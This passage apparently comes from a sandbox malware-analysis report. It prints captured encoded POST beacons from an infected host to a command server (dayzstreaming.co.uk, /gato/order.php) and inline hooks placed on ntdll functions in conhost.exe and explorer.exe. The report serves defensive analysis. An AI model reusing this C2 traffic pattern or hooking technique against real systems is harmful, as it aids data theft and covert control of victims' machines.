33 43 43 44 37 45 41 37 36 43 43 43 33 45 41 37 45 43 43 43 39 45 41 36 45 43 43 44 38 45 41 36 43 43 43 39 37 45 41 37 38 43 43 43 31 45 41 37 38 43 43 26 63 73 32 3d 37 34 43 43 44 43 45 41 36 35 43 43 43 39 45 41 37 31 43 43 44 36 45 41 36 46 43 43 44 43 45 41 33 33 43 43 44 43 45 41 36 35 43 43 44 43 45 41 26 63 73 33 3d 37 43 43 43 44 44 45 41 37 30 43 43 44 30 45 41 37 33 43 43 39 34 45 41 34 44 43 43 46 41 45 41 34 31 43 43 44 38 45 41 37 39 43 43 44 34 45 41 37 34 43 43 44 37 45 41
Data Ascii: ps0=0000000000000000000000000000000000000000000000000000000000&ps1=F3ADFD670F432699F858C2F783B205032940EE1627AF51DCFC4C974BB07C2CB42A5A45018D630E947E13F5C77FC6943D598B51282DF08C21C23F41E895996BFA0DD525D14466756382306CB85B08F2FB2489CD35403963593ECC4FF5B710F24C4B7D27491294076488588AD01274289A6994047C52A5E972E0D21D7397AC7718A514AE48BE70480A6ACAD37F5B5B59C05DB52E3A&cs1=5ECC83EA41CCE9EA6FCCD6EA7ACCCBEA7CCCD4EA59CCD8EA69CCD8EA41CCDBEA71CCD8EA7ECCD2EA6ECCD0EA71CCCFEA78CCCBEA2DCCE5EA73CCD7EA76CCC3EA7ECCC9EA6ECCD8EA6CCC97EA78CCC1EA78CC&cs2=74CCDCEA65CCC9EA71CCD6EA6FCCDCEA33CCDCEA65CCDCEA&cs3=7CCCDDEA70CCD0EA73CC94EA4DCCFAEA41CCD8EA79CCD4EA74CCD7EA
5
Nov 28, 2013 07:18:00.121244907 CET4918680192.168.0.337.221.170.194POST /gato/order.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: dayzstreaming.co.uk
Content-Length: 636
Cache-Control: no-cache
Data Raw: 70 73 30 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 70 73 31 3d 46 45 46 43 33 46 34 34 30 45 30 36 38 41 43 35 32 32 36 39 39 44 46 33 37 43 33 46 43 43 39 45 34 35 41 32 35 38 46 39 37 38 36 42 45 34 42 46 39 30 46 39 45 41 30 45 30 46 37 37 41 41 44 41 43 44 39 44 31 36 30 36 30 33 42 34 42 37 42 36 39 33 39 45 35 34 32 30 35 35 42 41 38 35 44 35 37 46 30 41 45 38 36 37 34 46 32 37 30 45 37 35 30 35 32 35 37 32 45 44 41 34 33 43 30 43 33 34 37 36 30 30 41 31 41 31 37 39 35 36 46 31 37 45 45 44 31 41 37 32 44 33 39 41 33 42 34 38 32 38 37 32 34 46 44 38 43 44 37 44 39 34 41 46 45 41 33 31 43 34 44 44 38 37 42 32 30 32 35 46 45 31 38 45 35 46 41 35 33 39 39 32 37 38 41 30 36 44 39 44 33 39 44 32 36 32 36 32 34 41 35 41 33 34 42 30 44 42 33 30 37 44 37 35 42 39 46 39 41 43 43 37 36 41 38 39 41 32 30 33 44 45 42 41 44 35 34 45 35 39 37 37 44 39 31 35 35 35 43 46 45 42 37 35 42 43 36 39 43 32 46 36 38 44 44 45 44 38 37 44 32 34 36 42 43 31 26 63 73 31 3d 35 45 43 43 38 33 45 41 34 31 43 43 45 39 45 41 36 46 43 43 44 36 45 41 37 41 43 43 43 42 45 41 37 43 43 43 44 34 45 41 35 39 43 43 44 38 45 41 36 39 43 43 44 38 45 41 34 31 43 43 44 42 45 41 37 31 43 43 44 38 45 41 37 45 43 43 44 32 45 41 36 45 43 43 44 30 45 41 37 31 43 43 43 46 45 41 37 38 43 43 43 42 45 41 32 44 43 43 45 35 45 41 37 33 43 43 44 37 45 41 37 36 43 43 43 33 45 41 37 45 43 43 43 39 45 41 36 45 43 43 44 38 45 41 36 43 43 43 39 37 45 41 37 38 43 43 43 31 45 41 37 38 43 43 26 63 73 32 3d 37 34 43 43 44 43 45 41 36 35 43 43 43 39 45 41 37 31 43 43 44 36 45 41 36 46 43 43 44 43 45 41 33 33 43 43 44 43 45 41 36 35 43 43 44 43 45 41 26 63 73 33 3d 37 43 43 43 44 44 45 41 37 30 43 43 44 30 45 41 37 33 43 43 39 34 45 41 34 44 43 43 46 41 45 41 34 31 43 43 44 38 45 41 37 39 43 43 44 34 45 41 37 34 43 43 44 37 45 41
Data Ascii: ps0=000000000000000000000000000000000000000000000000&ps1=FEFC3F440E068AC522699DF37C3FCC9E45A258F9786BE4BF90F9EA0E0F77AADACD9D160603B4B7B6939E542055BA85D57F0AE8674F270E75052572EDA43C0C347600A1A17956F17EED1A72D39A3B4828724FD8CD7D94AFEA31C4DD87B2025FE18E5FA5399278A06D9D39D262624A5A34B0DB307D75B9F9ACC76A89A203DEBAD54E5977D91555CFEB75BC69C2F68DDED87D246BC1&cs1=5ECC83EA41CCE9EA6FCCD6EA7ACCCBEA7CCCD4EA59CCD8EA69CCD8EA41CCDBEA71CCD8EA7ECCD2EA6ECCD0EA71CCCFEA78CCCBEA2DCCE5EA73CCD7EA76CCC3EA7ECCC9EA6ECCD8EA6CCC97EA78CCC1EA78CC&cs2=74CCDCEA65CCC9EA71CCD6EA6FCCDCEA33CCDCEA65CCDCEA&cs3=7CCCDDEA70CCD0EA73CC94EA4DCCFAEA41CCD8EA79CCD4EA74CCD7EA
68

Code Manipulation Behavior

User Modules
Hook Summary
Function NameHook TypeActive in Processes
RtlFreeHeapINLINEconhost.exe
KiFastSystemCallINLINEexplorer.exe
KiFastSystemCallRetINLINEexplorer.exe
Processes
Process: conhost.exe, Module: ntdll.dll
Function NameHook TypeNew Data
RtlFreeHeapINLINE0x68 0x8D 0xD9 0x93 0x3E 0xE9
Process: explorer.exe, Module: ntdll.dll
Function NameHook TypeNew Data
KiFastSystemCallINLINE0xEB 0xB0 0x03 0x30 0x0F 0xF3
KiFastSystemCallRetINLINE0xC3 0x36 0x68 0x81 0x1F 0xF8

System Behavior